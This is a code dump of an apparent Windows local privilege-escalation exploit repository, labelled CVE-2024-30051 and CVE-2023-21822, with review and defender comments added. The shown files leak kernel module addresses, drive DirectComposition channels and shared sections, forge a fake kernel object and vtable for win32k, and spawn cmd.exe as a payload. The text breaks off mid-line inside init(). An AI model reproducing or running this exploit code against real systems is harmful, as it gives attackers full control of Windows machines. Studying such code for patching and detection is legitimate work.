      // NOTE(review): the GetProcAddress result is not checked before the call.
109 | NTSTATUS NTAPI My_NtQuerySystemInformation(
110 |     SYSTEM_INFORMATION_CLASS SystemInformationClass,
111 |     PVOID SystemInformation,
112 |     ULONG SystemInformationLength,
113 |     ULONG *ReturnLength
114 | )
115 | {
116 |     if (g_pfnNtQuerySystemInformation == NULL) {
117 |         g_pfnNtQuerySystemInformation = (FuncTy_NtQuerySystemInformation)GetProcAddress(
118 |             LoadLibraryW(L"ntdll.dll"), "NtQuerySystemInformation"
119 |         );
120 |     }
121 |
122 |     return g_pfnNtQuerySystemInformation(
123 |         SystemInformationClass,
124 |         SystemInformation,
125 |         SystemInformationLength,
126 |         ReturnLength
127 |     );
128 | };
129 |
      // Queries class 64 (MySystemExtendedHandleInformation) into a VirtualAlloc'd
      // buffer, quadrupling the buffer while the call reports
      // STATUS_INFO_LENGTH_MISMATCH. On success *ppInfo receives the buffer and
      // the caller owns it; otherwise *ppInfo stays NULL. Returns the last status.
      // NOTE(review): VirtualAlloc results are unchecked; MEM_DECOMMIT with a size
      // decommits the pages but keeps the address range reserved; the buffer is
      // not freed when the final status is a failure.
      // NOTE(defender): the records returned by this class carry object addresses
      // (the `Object` field above). Newer Windows builds reportedly limit what
      // unprivileged callers get back — verify on the build under test.
130 | NTSTATUS GetHandlesInfo(ptr_My_SYSTEM_HANDLE_INFORMATION* ppInfo) {
131 |     *ppInfo = NULL;
132 |
133 |     SIZE_T szInfo = 0x10000;
134 |     ptr_My_SYSTEM_HANDLE_INFORMATION lpInfo = (ptr_My_SYSTEM_HANDLE_INFORMATION)VirtualAlloc(NULL, szInfo, MEM_COMMIT, PAGE_READWRITE);
135 |
136 |     NTSTATUS status = My_NtQuerySystemInformation(
137 |         (SYSTEM_INFORMATION_CLASS)MySystemExtendedHandleInformation,lpInfo,szInfo,NULL);
138 |
139 |     while (status == STATUS_INFO_LENGTH_MISMATCH) {
140 |
141 |         VirtualFree(lpInfo, szInfo, MEM_DECOMMIT);
142 |
143 |         szInfo *= 4;
144 |         lpInfo = (ptr_My_SYSTEM_HANDLE_INFORMATION)VirtualAlloc(
145 |             NULL, szInfo, MEM_COMMIT, PAGE_READWRITE);
146 |
147 |         status = My_NtQuerySystemInformation(
148 |             (SYSTEM_INFORMATION_CLASS)MySystemExtendedHandleInformation, lpInfo, szInfo, NULL
149 |         );
              // Redundant with the loop condition, kept as written.
150 |         if (NT_SUCCESS(status))
151 |             break;
152 |     }
153 |
154 |     if (NT_SUCCESS(status))
155 |         *ppInfo = lpInfo;
156 |
157 |     return status;
158 | }
159 |
      // Same grow-and-retry pattern as GetHandlesInfo, for
      // MySystemModuleInformation (11): on success *ppInfo receives a buffer of
      // module records, each with an image base address and size. The same
      // review and defender notes apply.
160 | NTSTATUS GetModulesInfo(ptr_My_SYSTEM_MODULE_INFORMATION* ppInfo) {
161 |     *ppInfo = NULL;
162 |
163 |     SIZE_T szInfo = 0x10000;
164 |
165 |     ptr_My_SYSTEM_MODULE_INFORMATION lpInfo = (ptr_My_SYSTEM_MODULE_INFORMATION)VirtualAlloc(NULL, szInfo, MEM_COMMIT, PAGE_READWRITE);
166 |
167 |     NTSTATUS status = My_NtQuerySystemInformation(
168 |         (SYSTEM_INFORMATION_CLASS)MySystemModuleInformation,lpInfo,szInfo,NULL);
169 |
170 |     while (status == STATUS_INFO_LENGTH_MISMATCH) {
171 |
172 |         VirtualFree(lpInfo, szInfo, MEM_DECOMMIT);
173 |
174 |         szInfo *= 4;
175 |         lpInfo = (ptr_My_SYSTEM_MODULE_INFORMATION)VirtualAlloc(
176 |             NULL, szInfo, MEM_COMMIT, PAGE_READWRITE);
177 |
178 |         status = My_NtQuerySystemInformation(
179 |             (SYSTEM_INFORMATION_CLASS)MySystemModuleInformation, lpInfo, szInfo, NULL
180 |         );
181 |         if (NT_SUCCESS(status))
182 |             break;
183 |     }
184 |
185 |     if (NT_SUCCESS(status))
186 |         *ppInfo = lpInfo;
187 |
188 |     return status;
189 | };
190 |
191 | #endif // _NTHELPER
--------------------------------------------------------------------------------
/cve-2024-30051/src/dcomp.cpp:
--------------------------------------------------------------------------------
     // Implementation of the channel and shared-section wrappers declared in
     // dcomp.h. Commands are appended to m_stream and submitted with process().
1 | #include "dcomp.h"
2 |
3 |
     // Creates a channel; the create call receives pointers to m_hch, m_size and
     // m_mapped, and the stream is then built over (m_mapped, m_size). On failure
     // the NTSTATUS is kept in m_error and the stream is left default-constructed.
4 | dcomp_channel_t::dcomp_channel_t(SIZE_T size): m_size(size), m_error(0), m_ctr(1) {
5 |     auto ntstatus = (*ponylib::win32u::kNtDCompositionCreateChannel)(&m_hch, &m_size, &m_mapped);
6 |     if (!NT_SUCCESS(ntstatus)) {
7 |         m_error = ntstatus;
8 |         return;
9 |     }
10 |     m_stream = ponylib::memory::memory_stream_t(m_mapped, m_size);
11 | }
     // NOTE(review): the destroy call is made even when creation failed, and its
     // status is ignored.
12 | dcomp_channel_t::~dcomp_channel_t() {
13 |     (*ponylib::win32u::kNtDCompositionDestroyChannel)(m_hch);
14 | }
     // The fixed-size builders below all follow one pattern: zero-initialise the
     // record, fill Id and the fields from the arguments, append it to m_stream
     // and return the stream's write result.
15 | bool dcomp_channel_t::createResource(UINT32 dwTypeId, UINT32 dwIndex, UINT32 dwShared) {
16 |     dcomp_command_create_resource_t cmd = {0, 0, 0, 0};
17 |
18 |     cmd.Id = (UINT32)dcomp_command_id_t::CreateResource;
19 |     cmd.Index = dwIndex;
20 |     cmd.TypeId = dwTypeId;
21 |     cmd.Shared = dwShared;
22 |
23 |     return m_stream.write(std::move(cmd));
24 | };
25 | bool dcomp_channel_t::openSharedResource(UINT32 dwIndex, UINT64 dwHandle, UINT32 dwTypeId, UINT32 dwReserved1) {
26 |     dcomp_command_open_shared_resource_t cmd = {0, 0, 0, 0, 0};
27 |
28 |     cmd.Id = (UINT32)dcomp_command_id_t::OpenSharedResource;
29 |     cmd.Index = dwIndex;
30 |     cmd.TypeId = dwTypeId;
31 |     cmd.Handle = dwHandle;
32 |     cmd.Reserved1 = dwReserved1;
33 |
34 |     return m_stream.write(std::move(cmd));
35 | };
36 | bool dcomp_channel_t::setIntegerProperty(UINT32 dwIndex, UINT64 dqPropertyId, UINT64 dqPropertyValue) {
37 |     dcomp_command_set_resource_integer_property_t cmd = {0 ,0, 0, 0};
38 |
39 |     cmd.Id = (UINT32)dcomp_command_id_t::SetResourceIntegerProperty;
40 |     cmd.Index = dwIndex;
41 |     cmd.PropertyId = dqPropertyId;
42 |     cmd.PropertyValue = dqPropertyValue;
43 |
44 |     return m_stream.write(std::move(cmd));
45 | };
46 | bool dcomp_channel_t::setFloatProperty(UINT32 dwIndex, UINT32 dwPropertyId, FLOAT dqPropertyValue) {
47 |     dcomp_command_set_resource_float_property_t cmd = {0 ,0, 0, 0};
48 |
49 |     cmd.Id = (UINT32)dcomp_command_id_t::SetResourceFloatProperty;
50 |     cmd.Index = dwIndex;
51 |     cmd.PropertyId = dwPropertyId;
52 |     cmd.PropertyValue = dqPropertyValue;
53 |
54 |     return m_stream.write(std::move(cmd));
55 | };
56 | bool dcomp_channel_t::setReferenceProperty(UINT32 dwIndex, UINT32 dwPropertyId, UINT32 dwPropertyValue) {
57 |     dcomp_command_set_resource_reference_property_t cmd = {0 ,0, 0, 0};
58 |     cmd.Id = (UINT32)dcomp_command_id_t::SetResourceReferenceProperty;
59 |     cmd.Index = dwIndex;
60 |     cmd.PropertyId = dwPropertyId;
61 |     cmd.PropertyValue = dwPropertyValue;
62 |
63 |     return m_stream.write(std::move(cmd));
64 | };
     // Variable-length record: header plus `size` payload bytes copied from
     // `buffer`. The temporary is sized as sizeof(record) - 1 + size because the
     // record already declares one UINT8 of payload.
     // NOTE(review): ArraySize is a UINT32, so `size` is truncated by the cast if
     // it exceeds 32 bits while memcpy still uses the full value; `buffer` is not
     // checked for NULL.
65 | bool dcomp_channel_t::setBufferProperty(UINT32 dwIndex, UINT32 dqPropertyId, PVOID buffer, SIZE_T size) {
66 |     auto dyn_cmd_size = sizeof(dcomp_command_set_resource_buffer_property_t) - 1 + size;
67 |     auto dyn_mem = new UINT8[dyn_cmd_size];
68 |     auto* dyn_cmd = (dcomp_command_set_resource_buffer_property_t*)(dyn_mem);
69 |
70 |     dyn_cmd->Id = (UINT32)dcomp_command_id_t::SetResourceBufferProperty;
71 |     dyn_cmd->Index = dwIndex;
72 |     dyn_cmd->PropertyId = dqPropertyId;
73 |     dyn_cmd->ArraySize = (UINT32)(size);
74 |
75 |     memcpy(&dyn_cmd->Array, buffer, size);
76 |
77 |     auto r = m_stream.writeData(
78 |         dyn_cmd, dyn_cmd_size
79 |     );
80 |
81 |     dyn_cmd = nullptr;
82 |
83 |     delete[] dyn_mem;
84 |
85 |     return r;
86 | };
     // Same construction for an array of UINT32 values: szIndices is an element
     // count, and ArraySize receives that count (not a byte length).
87 | bool dcomp_channel_t::setReferenceArrayProperty(UINT32 dwIndex, UINT32 dqPropertyId, UINT32 dwIndice[], SIZE_T szIndices) {
88 |     auto dyn_cmd_size = sizeof(dcomp_command_set_resource_reference_array_property_t) - sizeof(UINT32) + szIndices * sizeof(UINT32);
89 |     auto dyn_mem = new UINT8[dyn_cmd_size];
90 |     auto* dyn_cmd = (dcomp_command_set_resource_reference_array_property_t*)(dyn_mem);
91 |
92 |     dyn_cmd->Id = (UINT32)dcomp_command_id_t::SetResourceReferenceArrayProperty;
93 |     dyn_cmd->Index = dwIndex;
94 |     dyn_cmd->PropertyId = dqPropertyId;
95 |     dyn_cmd->ArraySize = (UINT32)(szIndices);
96 |
97 |     memcpy(&dyn_cmd->Array, dwIndice, szIndices * sizeof(UINT32));
98 |
99 |     auto r = m_stream.writeData(
100 |         dyn_cmd, dyn_cmd_size
101 |     );
102 |     dyn_cmd = nullptr;
103 |
104 |     delete[] dyn_mem;
105 |
106 |     return r;
107 | };
      // cmd_size is computed but unused here and in releaseResource.
108 | bool dcomp_channel_t::addVisualChild(UINT32 dwIndex, UINT32 dwIndexChild, UINT32 dwMode, UINT32 dwAdditionalIndex) {
109 |     dcomp_command_add_visual_child_t cmd = {0 ,0, 0, 0, 0};
110 |     constexpr auto cmd_size = sizeof(dcomp_command_add_visual_child_t);
111 |
112 |     cmd.Id = (UINT32)dcomp_command_id_t::AddVisualChild;
113 |     cmd.Index = dwIndex;
114 |     cmd.IndexChild = dwIndexChild;
115 |     cmd.Mode = dwMode;
116 |     cmd.AdditionalIndex = dwAdditionalIndex;
117 |
118 |     return m_stream.write(std::move(cmd));
119 | };
120 |
121 | bool dcomp_channel_t::releaseResource(UINT32 dwIndex) {
122 |     dcomp_command_release_resource_t cmd = {0, 0};
123 |     constexpr auto cmd_size = sizeof(dcomp_command_release_resource_t);
124 |
125 |     cmd.Id = (UINT32)dcomp_command_id_t::ReleaseResource;
126 |     cmd.Index = dwIndex;
127 |
128 |     return m_stream.write(std::move(cmd));
129 | };
      // Calls the commit entry point for the channel. Returns false and records
      // the NTSTATUS in m_error on failure; the two outputs are discarded.
130 | bool dcomp_channel_t::commit() {
131 |     DWORD out1;
132 |     BOOL out2;
133 |     BOOL in1 = FALSE;
134 |
135 |     auto ntstatus = (*ponylib::win32u::kNtDCompositionCommitChannel)(
136 |         m_hch, &out1, &out2, in1, NULL, NULL, NULL, NULL
137 |     );
138 |     if (!NT_SUCCESS(ntstatus)) {
139 |         m_error = ntstatus;
140 |         return false;
141 |     }
142 |     return true;
143 | };
      // Submits the records written so far, passing m_stream.pos() as the second
      // argument (presumably the number of bytes written — confirm in
      // memory_stream_t), then clears the stream on success. On failure the
      // stream is left as is and the NTSTATUS goes to m_error.
      // Only dwArg2 is initialised by the declaration below.
144 | bool dcomp_channel_t::process() {
145 |     DWORD dwArg1, dwArg2 = NULL;
146 |
147 |     auto status = (*ponylib::win32u::kNtDCompositionProcessChannelBatchBuffer)(
148 |         m_hch,
149 |         m_stream.pos(),
150 |         &dwArg1,
151 |         &dwArg2
152 |     );
153 |
154 |     if (!NT_SUCCESS(status)) {
155 |         m_error = status;
156 |         return false;
157 |     }
158 |
159 |     m_stream.erase();
160 |
161 |     return true;
162 | };
      // process() followed by commit(); stops after process() if it failed.
163 | bool dcomp_channel_t::apply() {
164 |     auto r = process();
165 |     if (!r)
166 |         return r;
167 |     return commit();
168 | };
169 |
170 |
      // Creates resource (dwTypeId, dwIndex) on the channel, submits and commits
      // it, creates and binds a section of m_size bytes to that resource, and maps
      // a read/write view of the section into the current process. The first
      // failing step stores its status in m_error and returns early.
      // NOTE(review): m_hSection is not initialised before the early returns; the
      // view size is passed as `&size`, the by-value parameter, so any value
      // written back is not stored in m_size.
171 | dcomp_shared_section_t::dcomp_shared_section_t(dcomp_channel_t* pch, UINT32 dwIndex, UINT32 dwTypeId, SIZE_T size):
172 |     m_ch(pch),
173 |     m_index(dwIndex),
174 |     m_typeId(dwTypeId),
175 |     m_size(size) ,
176 |     m_error(0),
177 |     m_pMapped(0) {
178 |     if ( !m_ch->createResource(m_typeId, m_index, 0) ) {
179 |         m_error = pch->error();
180 |         return;
181 |     }
182 |     if ( !m_ch->process() ) {
183 |         m_error = pch->error();
184 |         return;
185 |     }
186 |     if ( !m_ch->commit() ) {
187 |         m_error = pch->error();
188 |         return;
189 |     }
190 |
191 |     auto ntstatus = (*ponylib::win32u::kNtDCompositionCreateAndBindSharedSection)(pch->hch(), m_index, m_size, &m_hSection);
192 |     if (!NT_SUCCESS(ntstatus)) {
193 |         m_error = ntstatus;
194 |         return;
195 |     }
196 |
197 |     ntstatus = (*ponylib::nt::kNtMapViewOfSection)(
198 |         m_hSection,
199 |         GetCurrentProcess(),
200 |         &m_pMapped,
201 |         NULL,
202 |         NULL,
203 |         NULL,
204 |         &size,
205 |         2, // ViewUnmap
206 |         NULL,
207 |         PAGE_READWRITE
208 |     );
209 |     if ( !NT_SUCCESS(ntstatus) ) {
210 |         m_error = ntstatus;
211 |         return;
212 |     }
213 | };
214 |
      // Unmaps the view and appends a ReleaseResource record to the channel's
      // stream; the record is only written, not submitted, here.
      // NOTE(review): nothing is cleaned up when m_error is set (for example when
      // the section was created but mapping failed), and m_hSection is never
      // closed on any path.
215 | dcomp_shared_section_t::~dcomp_shared_section_t() {
216 |     if (m_error != 0) {
217 |         return;
218 |     }
219 |
220 |     if (m_pMapped) {
221 |         (*ponylib::nt::kNtUnmapViewOfSection)(GetCurrentProcess(), m_pMapped);
222 |     }
223 |
224 |     m_ch->releaseResource(m_index);
225 | }
--------------------------------------------------------------------------------
/cve-2024-30051/ponylib/nt.h:
--------------------------------------------------------------------------------
1 | #ifndef _PONYLIB_NT
2 | #define _PONYLIB_NT
3 |
4 | #include "ponylib.h"
5 |
6 | #include
7 | #include
8 | #include
9 | #include
10 |
11 |
12 | namespace ponylib::nt {
13 |     /*
14 |     NT API Proxies
15 |     */
16 |     using nt_map_view_of_section_t = system_function_t<
17 |         NTSTATUS (NTAPI*)(
18 |             HANDLE SectionHandle,
19 |             HANDLE ProcessHandle,
20 |             PVOID *BaseAddress,
21 |             ULONG_PTR ZeroBits,
22 |             SIZE_T CommitSize,
23 |             PLARGE_INTEGER SectionOffset,
24 |
PSIZE_T ViewSize, 25 | DWORD InheritDisposition, 26 | ULONG AllocationType, 27 | ULONG Win32Protect 28 | ) 29 | >; 30 | using nt_query_system_information_t = system_function_t< 31 | NTSTATUS(NTAPI*)( 32 | ULONG SystemInformationClass, 33 | PVOID SystemInformation, 34 | ULONG SystemInformationLength, 35 | PULONG ReturnLength 36 | ) 37 | >; 38 | using nt_unmap_view_of_section_t = system_function_t< 39 | NTSTATUS(NTAPI*)( 40 | HANDLE ProcessHandle, 41 | PVOID BaseAddress 42 | ) 43 | >; 44 | 45 | /* 46 | NT API Proxies constants 47 | */ 48 | extern nt_map_view_of_section_t kNtMapViewOfSection; 49 | extern nt_unmap_view_of_section_t kNtUnmapViewOfSection; 50 | extern nt_query_system_information_t kNtQuerySystemInformation; 51 | 52 | 53 | /* 54 | NT API Structs & Typedefs 55 | 56 | SYSTEM_PROCESS_INFORMATION, UNICODE_STRING, KPRIORITY, SYSTEM_THREAD_INFORMATION, SYSTEM_INFORMATION_CLASS taken from Scylla 57 | - https://github.com/NtQuery/Scylla/blob/master/Scylla/NativeWinApi.h 58 | */ 59 | typedef LONG KPRIORITY; 60 | typedef struct _UNICODE_STRING { 61 | USHORT Length; 62 | USHORT MaximumLength; 63 | PWSTR Buffer; 64 | } UNICODE_STRING, *PUNICODE_STRING; 65 | typedef struct _CLIENT_ID{ 66 | HANDLE UniqueProcess; 67 | HANDLE UniqueThread; 68 | } CLIENT_ID, *PCLIENT_ID; 69 | typedef struct _SYSTEM_THREAD_INFORMATION 70 | { 71 | LARGE_INTEGER KernelTime; 72 | LARGE_INTEGER UserTime; 73 | LARGE_INTEGER CreateTime; 74 | ULONG WaitTime; 75 | PVOID StartAddress; 76 | CLIENT_ID ClientId; 77 | KPRIORITY Priority; 78 | LONG BasePriority; 79 | ULONG ContextSwitches; 80 | ULONG ThreadState; 81 | ULONG WaitReason; 82 | } SYSTEM_THREAD_INFORMATION, *PSYSTEM_THREAD_INFORMATION; 83 | typedef struct _SYSTEM_PROCESS_INFORMATION 84 | { 85 | ULONG NextEntryOffset; 86 | ULONG NumberOfThreads; 87 | LARGE_INTEGER SpareLi1; 88 | LARGE_INTEGER SpareLi2; 89 | LARGE_INTEGER SpareLi3; 90 | LARGE_INTEGER CreateTime; 91 | LARGE_INTEGER UserTime; 92 | LARGE_INTEGER KernelTime; 93 | UNICODE_STRING 
ImageName; 94 | KPRIORITY BasePriority; 95 | HANDLE UniqueProcessId; 96 | HANDLE InheritedFromUniqueProcessId; 97 | ULONG HandleCount; 98 | ULONG SessionId; 99 | ULONG_PTR PageDirectoryBase; 100 | SIZE_T PeakVirtualSize; 101 | SIZE_T VirtualSize; 102 | ULONG PageFaultCount; 103 | SIZE_T PeakWorkingSetSize; 104 | SIZE_T WorkingSetSize; 105 | SIZE_T QuotaPeakPagedPoolUsage; 106 | SIZE_T QuotaPagedPoolUsage; 107 | SIZE_T QuotaPeakNonPagedPoolUsage; 108 | SIZE_T QuotaNonPagedPoolUsage; 109 | SIZE_T PagefileUsage; 110 | SIZE_T PeakPagefileUsage; 111 | SIZE_T PrivatePageCount; 112 | LARGE_INTEGER ReadOperationCount; 113 | LARGE_INTEGER WriteOperationCount; 114 | LARGE_INTEGER OtherOperationCount; 115 | LARGE_INTEGER ReadTransferCount; 116 | LARGE_INTEGER WriteTransferCount; 117 | LARGE_INTEGER OtherTransferCount; 118 | SYSTEM_THREAD_INFORMATION Threads[1]; 119 | } SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION; 120 | typedef enum _SYSTEM_INFORMATION_CLASS { 121 | SystemBasicInformation, 122 | SystemProcessorInformation, 123 | SystemPerformanceInformation, 124 | SystemTimeOfDayInformation, 125 | SystemPathInformation, 126 | SystemProcessInformation, 127 | SystemCallCountInformation, 128 | SystemDeviceInformation, 129 | SystemProcessorPerformanceInformation, 130 | SystemFlagsInformation, 131 | SystemCallTimeInformation, 132 | SystemModuleInformation, 133 | SystemLocksInformation, 134 | SystemStackTraceInformation, 135 | SystemPagedPoolInformation, 136 | SystemNonPagedPoolInformation, 137 | SystemHandleInformation, 138 | SystemObjectInformation, 139 | SystemPageFileInformation, 140 | SystemVdmInstemulInformation, 141 | SystemVdmBopInformation, 142 | SystemFileCacheInformation, 143 | SystemPoolTagInformation, 144 | SystemInterruptInformation, 145 | SystemDpcBehaviorInformation, 146 | SystemFullMemoryInformation, 147 | SystemLoadGdiDriverInformation, 148 | SystemUnloadGdiDriverInformation, 149 | SystemTimeAdjustmentInformation, 150 | SystemSummaryMemoryInformation, 
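151 | SystemNextEventIdInformation, 152 | SystemEventIdsInformation, 153 | SystemCrashDumpInformation, 154 | SystemExceptionInformation, 155 | SystemCrashDumpStateInformation, 156 | SystemKernelDebuggerInformation, 157 | SystemContextSwitchInformation, 158 | SystemRegistryQuotaInformation, 159 | SystemExtendServiceTableInformation, 160 | SystemPrioritySeperation, 161 | SystemPlugPlayBusInformation, 162 | SystemDockInformation, 163 | SystemPowerInformation2, 164 | SystemProcessorSpeedInformation, 165 | SystemCurrentTimeZoneInformation, 166 | SystemLookasideInformation 167 | } SYSTEM_INFORMATION_CLASS; 168 |

    /*
        NT API Utils Impls
    */

    // One row of a process snapshot. build() fills processId, sessionId and
    // filename; imagebase, imagesize and peb are stored as 0 and fullpath is
    // left empty.
    typedef struct _process_t {
        UINT32 processId;
        UINT32 sessionId;

        UINT64 imagebase;
        UINT64 imagesize;

        UINT64 peb;

        std::wstring filename;
        std::wstring fullpath;

    } process_t,*ptr_process_t;

    // Process list captured with NtQuerySystemInformation(SystemProcessInformation).
    class proc_snapshot_t {
    protected:
        // NOTE(review): the template arguments of std::vector / std::function
        // were lost when this page was extracted. They are reconstructed here
        // from how the members are used; confirm against the repository.
        std::vector<process_t> m_processes;

    public:
        proc_snapshot_t() {}

        /*
            Rebuilds the snapshot from scratch.

            Returns 0 on success, the failing NTSTATUS of the query otherwise,
            or STATUS_NO_MEMORY when the query buffer cannot be allocated.
            Entries whose UniqueProcessId is 4 or lower are skipped.
        */
        NTSTATUS build() {
            const NTSTATUS kInfoLengthMismatch = (NTSTATUS)0xC0000004L; // STATUS_INFO_LENGTH_MISMATCH
            const NTSTATUS kNoMemory           = (NTSTATUS)0xC0000017L; // STATUS_NO_MEMORY

            m_processes.clear();

            HANDLE hHeap = GetProcessHeap();

            ULONG returnLength = 0;
            ULONG bufferLength = 0x1000;
            PSYSTEM_PROCESS_INFORMATION pBuffer = NULL;
            NTSTATUS status = 0;

            // Retry with a larger buffer while the kernel reports it is too small.
            for (;;) {
                pBuffer = (PSYSTEM_PROCESS_INFORMATION)HeapAlloc(hHeap, HEAP_ZERO_MEMORY, bufferLength);
                if (pBuffer == NULL) {
                    // The buffer is dereferenced below, so fail cleanly instead.
                    return kNoMemory;
                }

                returnLength = 0;
                status = (*kNtQuerySystemInformation)(SystemProcessInformation, pBuffer, bufferLength, &returnLength);
                if (status != kInfoLengthMismatch) {
                    break;
                }

                HeapFree(hHeap, 0, pBuffer);
                pBuffer = NULL;

                // Jump to the size the kernel asked for when it reported one,
                // plus a page of slack, because the process list can grow
                // between two calls.
                bufferLength = (returnLength > bufferLength ? returnLength : bufferLength) + 0x1000;
            }

            if ( !NT_SUCCESS(status) ) {
                HeapFree(hHeap, 0, pBuffer);

                return status;
            }

            PBYTE pCursor = (PBYTE)pBuffer;
            for (;;) {
                PSYSTEM_PROCESS_INFORMATION pIter = (PSYSTEM_PROCESS_INFORMATION)pCursor;

                if ((ULONG_PTR)pIter->UniqueProcessId > 4) {
                    // UNICODE_STRING carries its length in bytes and Buffer may
                    // be NULL, so do not rely on a terminating NUL.
                    std::wstring imageName;
                    if (pIter->ImageName.Buffer != NULL) {
                        imageName.assign(pIter->ImageName.Buffer, pIter->ImageName.Length / sizeof(WCHAR));
                    }
                    std::wstring imageFullName;

                    m_processes.push_back(
                        process_t {
                            (UINT32)(ULONG_PTR) pIter->UniqueProcessId,
                            (UINT32) pIter->SessionId,
                            (UINT64) 0,
                            (UINT64) 0,
                            (UINT64) 0,
                            imageName,
                            imageFullName
                        }
                    );
                }

                // NextEntryOffset == 0 marks the last record.
                if (pIter->NextEntryOffset == 0) {
                    break;
                }
                pCursor += pIter->NextEntryOffset;
            }

            // Everything needed was copied into m_processes. Release the query
            // buffer, which used to leak on every successful call.
            HeapFree(hHeap, 0, pBuffer);

            return 0;
        }

        // Returns the i-th captured process; std::vector::at throws
        // std::out_of_range when i is outside the snapshot.
        process_t& at(int i) {
            return m_processes.at(i);
        }

        // Returns copies of the captured processes for which fn returns true.
        std::vector<process_t> filter(std::function<bool(process_t&)> fn) {
            std::vector<process_t> filtered;
            std::copy_if(
                m_processes.begin(),
                m_processes.end(),
                std::back_inserter(filtered),
                fn
            );
            return filtered;
        }
    };
}


#endif // _PONYLIB_NT
-------------------------------------------------------------------------------- /cve-2023-21822/main.cpp: -------------------------------------------------------------------------------- 1 | #ifndef UNICODE 2 | #define UNICODE 3 | #endif 4 | 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | #include "umpd.h" 12 | #include "nt.h" 13 | 14 | #define PRINTER_NAME L"Microsoft XPS Document Writer" 15 | #define INIT() LoadLibraryA("user32.dll") 16 | 17 | #define OBJ_SET_QWORD(obj, offset, value) *(ULONG64*)( (PBYTE)(obj) + offset ) = (ULONG64)(value) 18 | #define OBJ_GET_QWORD(obj, offset) *(ULONG64*)( (PBYTE)(obj) + offset ) 19 | #define OBJ_SET_DWORD(obj, offset, value) *(ULONG32*)( (PBYTE)(obj) + offset ) = (ULONG32)(value) 20 | #define FAKE_OBJ_SET_VTABLE(obj, offset, value) *(ULONG64*)( (PBYTE)( *(ULONG64*)( (PBYTE)(obj) + 0 ) ) + offset ) = (ULONG64)(value) 21 | #define OBJ_LEA(obj, offset) (PVOID)( (PBYTE)(obj) + offset ) 22 | 23 | typedef HBITMAP (NTAPI* 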
FuncTy_NtGdiEngCreateDeviceBitmap) ( 24 | DHSURF dhsurf, 25 | tagSIZE sizl, 26 | FLONG fl 27 | ); 28 | 29 | typedef BOOL (NTAPI* FuncTy_NtGdiEngStretchBltROP)( 30 | SURFOBJ *psoDest, 31 | SURFOBJ *psoSrc, 32 | SURFOBJ *psoMask, 33 | CLIPOBJ *pco, 34 | XLATEOBJ *pxlo, 35 | COLORADJUSTMENT *pca, 36 | POINTL *pptlHTOrg, 37 | RECTL *prclDest, 38 | RECTL *prclSrc, 39 | POINTL *pptlMask, 40 | ULONG iMode, 41 | BRUSHOBJ *pbo, 42 | DWORD rop4 43 | ); 44 | 45 | FuncTy_NtGdiEngCreateDeviceBitmap NtGdiEngCreateDeviceBitmap = NULL; 46 | FuncTy_NtGdiEngStretchBltROP NtGdiEngStretchBltROP = NULL; 47 | 48 | 49 | HDC g_hdc = NULL; 50 | My_UMSO g_UmsoDest; 51 | My_UMSO g_UmsoSrc; 52 | 53 | PVOID g_pFakeObj = NULL; 54 | 55 | PVOID g_kFn = NULL; 56 | 57 | const CHAR const_kernel_name[] = "win32kfull.sys"; 58 | const UINT64 const_rva_Fn = 0x2c9740; // rva of vSrcCopyS16D16Identity 59 | 60 | int system() 61 | { 62 | SECURITY_ATTRIBUTES sa; 63 | HANDLE hRead, hWrite; 64 | byte buf[40960] = { 0 }; 65 | STARTUPINFOW si; 66 | PROCESS_INFORMATION pi; 67 | DWORD bytesRead; 68 | RtlSecureZeroMemory(&si, sizeof(si)); 69 | RtlSecureZeroMemory(&pi, sizeof(pi)); 70 | RtlSecureZeroMemory(&sa, sizeof(sa)); 71 | int br = 0; 72 | sa.nLength = sizeof(SECURITY_ATTRIBUTES); 73 | sa.lpSecurityDescriptor = NULL; 74 | sa.bInheritHandle = TRUE; 75 | if (!CreatePipe(&hRead, &hWrite, &sa, 0)) 76 | { 77 | printf("[!][system] CreatePipe(): Failed with %llx\n", GetLastError()); 78 | return -3; 79 | } 80 | 81 | si.cb = sizeof(STARTUPINFO); 82 | GetStartupInfoW(&si); 83 | si.hStdError = hWrite; 84 | si.hStdOutput = hWrite; 85 | si.lpDesktop = L"WinSta0\\Default"; 86 | wchar_t cmd[4096] = { L"cmd.exe" }; 87 | 88 | if (!CreateProcessW(NULL, cmd, NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) 89 | { 90 | CloseHandle(hWrite); 91 | CloseHandle(hRead); 92 | printf("[!][system] CreateProcessW(): Failed with %llx\n", GetLastError()); 93 | return -2; 94 | } 95 | CloseHandle(hWrite); 96 | 97 | } 98 | 99 | BOOL 
init_kernel_addresses() { 100 | 101 | ptr_My_SYSTEM_MODULE_INFORMATION lpInfo = NULL; 102 | if (GetModulesInfo(&lpInfo) < 0) { 103 | return FALSE; 104 | } 105 | 106 | for (int i = 0; i < lpInfo->ModulesCount; i++) { 107 | ptr_My_SYSTEM_MODULE lpModule = &lpInfo->Modules[i]; 108 | 109 | if (!strcmp(&lpModule->Name[lpModule->NameOffset], const_kernel_name)) { 110 | g_kFn = (PVOID)((UINT64)(lpModule->ImageBaseAddress) + const_rva_Fn); 111 | return TRUE; 112 | } 113 | }; 114 | 115 | return FALSE; 116 | }; 117 | 118 | PVOID init_fake_obj() { 119 | 120 | PBYTE lpFakeObj = (PBYTE)VirtualAlloc(NULL, 0x4000, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); 121 | 122 | memset(lpFakeObj, 0xCC, 0x1000); 123 | 124 | 125 | OBJ_SET_QWORD(lpFakeObj, 0xB8, NULL); // disable EngAcquireSemaphore 126 | OBJ_SET_QWORD(lpFakeObj, 0x00, OBJ_LEA(lpFakeObj, 0x1000) ); // set vtable points to our start of fake object 127 | 128 | OBJ_SET_DWORD(lpFakeObj, 0x80, 0xCC | 0x21); // allow CDDMULTIBITMAPLOCK::CDDMULTIBITMAPLOCK 129 | // to call function from vtable CddBitmapHw::SyncDXAccessInternal 130 | OBJ_SET_QWORD(lpFakeObj, 0x28, NULL); 131 | 132 | return lpFakeObj; 133 | } 134 | 135 | BOOL init() { 136 | if (!init_kernel_addresses()) 137 | return FALSE; 138 | 139 | HWND HelperWindow = CreateWindowEx(WS_EX_TOOLWINDOW, L"BUTTON", NULL, 140 | WS_VISIBLE | WS_POPUP | WS_BORDER | WS_DISABLED, 141 | 0, 0, 50, 50, NULL, NULL, GetModuleHandle(0), NULL); 142 | HDC HelperWindowDCScr = GetWindowDC(HelperWindow); // That screen related HBITMAP allow us reach cdd module 143 | FillMemory(&g_UmsoDest, 